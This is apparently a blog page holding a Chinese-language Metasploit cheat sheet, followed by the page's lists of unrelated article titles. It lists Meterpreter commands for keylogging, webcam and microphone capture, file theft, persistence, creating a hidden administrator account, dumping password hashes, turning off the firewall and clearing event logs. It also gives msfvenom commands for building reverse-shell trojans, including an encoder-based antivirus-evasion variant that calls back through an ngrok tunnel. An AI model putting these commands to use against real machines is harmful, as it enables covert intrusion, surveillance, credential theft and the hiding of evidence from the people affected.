MSF

链接数据库

linux查找文件
find / -name dabase.yml
链接数据库 db_connect -y path/database.yml
db_status 查询数据库链接状态

payload: windows/x64/meterpreter/reverse_tcp 命令 (以下命令基于这个payload)

background 后台
sessions -i 1 返回
sessions -l 列出所有session getwd 查看远程主机当前路径
getlwd 查看本地当前路径
search -d c:\\ -f *.doc 查找文件
upload 3.jpg c:\\1.jpg 上传文件
cat test.txt 查看文件
download c:\\phpstudy\\wke.doc /root/wke.doc 下载文件
route 查看路由
getpid 查看当前进程ID
execute -H -f calc.exe 执行文件
shell 开启shell
kill杀死进程
sysinfo 列出系统信息

进程迁移

ps  查看所有正在运行的进程
getuid 获取当前进程的用户
migrate 进程号 迁移进程 explorer.exe为桌面进程

开启键盘

keyscan_start  开启键盘记录 (需要有管理员权限)
keyscan_dump 显示记录的信息
keyscan_stop 关闭键盘记录

录制声音

record-mic -d 10  录制声音10秒

开启摄像头

webcam_list  查看摄像头连接
webcam_chat 开启摄像头
webcam_stop 关闭摄像头
webcam_snap开摄像头截屏
webcam_stream -i 1 -v true

桌面截屏

screenshot  截屏

开启VNC

run  vnc  开启vnc

持久化访问

run metsvc  安装持久化访问
run metsvc -r 卸载安装
另一种方法
run persistence -X -i 5 -p 445 -r ip

创建 隐藏用户

net user hacker$ hacker /add  创建隐藏用户
net localgroup admininistators hacker$ /add 添加用户到管理员组 用getgui创建用户 并分配管理员权限 开启远程桌面
run getgui -u hacker -p hacker

获取凭证(用户名和密码)

run post/windows/gather/hashdump

判断是否为虚拟机

run post/windows/gather/checkvm

获取目标主机最近的操作

run post/windows/gather/dumplinks

获取系统安装程序个补丁

run post/windows/gather/enum_applications

通过shell关闭防火墙

shell
netsh adcfirewall ser allprofiles srate off

开启端口转发

portfwd add -l 1235  -r  10.10.10.129  -p 3389
这样就把远程主机的端口 映射到本机的1235端口

清除日志

 clearev 清除日志

kali链接windows桌面

rdesktop  -u  admin  -p  admin  ip:port

kali命令行与窗口化切换

init 3 命令行  5桌面

msfvenom生成木马

msfvenom  -p  windows/x64/meterpreter/reverse_tcp  lhost=10.10.10.128   lport=10001 -f exe > /root/config.exe

免杀木马

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b ‘\x00’ lhost=server.ngrok.cclport=00000 -f c

-p 指定payload,–e 编码器,-i 编码次数(次数越多免杀几率越高),-b 去除坏字符,lhost 服务器(ngrok默认为server.ngrok.cc) lport 隧道的端口,-f 生成指定格式(py、exe等,建议生成c)

木马的使用

设置tcp监听

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 10.10.10.128
ser lport 10001
run

远程主机运行木马

windows命令

net  use  查看网络链接
net user admin 123456 /add 添加用户
net user admin 密码
net user admin /del

最新文章

  1. glut64位操作系统安装
  2. iOS和android游戏纹理优化和内存优化(cocos2d-x)(转载)
  3. Java Hour 23 Networking
  4. Unity-Animator深入系列---录制与回放
  5. 定位 - CoreLocation - 指南针
  6. webservice 生成代理类
  7. 《OpenCL异构计算》新版中译本派送中!
  8. php与web页面交互
  9. 21 viewPager--- hzScrollView ----llContainer
  10. 使用mpvue开发小程序教程(四)
  11. ubuntu开发项目不能执行热更新
  12. Linux 环境 Maven 安装&仓源配置
  13. DAY:3 列表
  14. Confluence 6 在数据源连接中启用校验查询
  15. [原创]Burp Suite web应用程序渗透测试神器
  16. kafka笔记3(生产者)
  17. [CSL 的字符串][栈,模拟]
  18. python测试开发django-30.发送附件EmailMessage
  19. Django的国际化
  20. PlayMaker的Transition和Global Transition

热门文章

  1. Windows office2019免费激活,附代码
  2. Linux基础:初识shell之系统命令基础
  3. MyBatis功能点一应用:二级缓存整合redis
  4. Windows禁用445端口
  5. jmeter分布式导致重复登录的问题、以及写txt、csv、统计行数
  6. 攻防世界-Crypto高手进阶区部分Writeup
  7. 5大知名的BI工具对比介绍
  8. C语言memcpy()函数和memmove()函数
  9. C# 2进制、8进制、10进制、16进制...各种进制转换
  10. 【C# 反射】使用 Activator 类 -激活器